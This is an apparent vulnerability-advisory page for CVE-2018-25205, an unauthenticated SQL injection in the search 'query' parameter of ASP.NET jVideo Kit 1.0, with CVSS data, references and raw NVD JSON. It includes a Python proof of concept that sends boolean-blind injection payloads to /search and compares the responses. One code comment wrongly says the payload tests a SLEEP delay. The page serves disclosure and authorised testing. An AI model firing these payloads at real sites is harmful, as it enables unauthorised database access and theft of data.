CVE-2018-25205

Description

ASP.NET jVideo Kit 1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to inject SQL commands through the 'query' parameter in the search functionality. Attackers can submit malicious SQL payloads via GET or POST requests to the /search endpoint to extract sensitive database information using boolean-based blind or error-based techniques.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

ASP.NET jVideo Kit 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def check_sqli(target_url):
    # The vulnerable endpoint is /search with parameter 'query'
    url = f"{target_url}/search"
    
    # Payload for Boolean-based Blind SQL Injection
    # This payload attempts to verify if the database waits (SLEEP) or returns a specific true condition
    # Adjust the payload based on the specific database backend (e.g., MSSQL, MySQL)
    payload_true = "test' AND 1=1-- -"
    payload_false = "test' AND 1=2-- -"
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded"
    }

    try:
        # Sending POST request with the injection payload
        data = {
            "query": payload_true
        }
        response_true = requests.post(url, data=data, headers=headers, timeout=5)
        
        data["query"] = payload_false
        response_false = requests.post(url, data=data, headers=headers, timeout=5)

        # Analyze response differences (Status code or Content Length)
        if response_true.status_code == 200 and response_false.status_code == 200:
            if response_true.text != response_false.text:
                print("[+] Potential SQL Injection vulnerability detected!")
                print(f"True Response Length: {len(response_true.text)}")
                print(f"False Response Length: {len(response_false.text)}")
            else:
                print("[-] Responses are identical, blind injection might require time-based analysis.")
        else:
            print(f"[!] Unexpected status codes: True={response_true.status_code}, False={response_false.status_code}")

    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")

if __name__ == "__main__":
    target = "http://example.com"  # Replace with actual target
    check_sqli(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2018-25205
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2018-25205
[3] CVE Details https://www.cvedetails.com/cve/CVE-2018-25205/
[4] VulDB https://vuldb.com/cve/CVE-2018-25205
[5] https://www.exploit-db.com/exploits/44739
[6] https://www.mediasoftpro.com/video-sharing-script/mvc/
[7] https://www.vulncheck.com/advisories/asp-net-jvideo-kit-sql-injection-via-query-parameter

Raw JSON Data

JSON

{"cve": {"id": "CVE-2018-25205", "sourceIdentifier": "[email protected]", "published": "2026-03-26T12:16:05.447", "lastModified": "2026-03-26T15:13:15.790", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "ASP.NET jVideo Kit 1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to inject SQL commands through the 'query' parameter in the search functionality. Attackers can submit malicious SQL payloads via GET or POST requests to the /search endpoint to extract sensitive database information using boolean-based blind or error-based techniques."}, {"lang": "es", "value": "ASP.NET jVideo Kit 1.0 contiene una vulnerabilidad de inyección SQL que permite a atacantes no autenticados inyectar comandos SQL a través del parámetro 'query' en la funcionalidad de búsqueda. Los atacantes pueden enviar cargas útiles SQL maliciosas mediante solicitudes GET o POST al endpoint /search para extraer información sensible de la base de datos utilizando técnicas ciegas basadas en booleanos o basadas en errores."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/44739", "source": "[email protected]"}, {"url": "https://www.mediasoftpro.com/video-sharing-script/mvc/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/asp-net-jvideo-kit-sql-injection-via-query-parameter", "source": "[email protected]"}]}}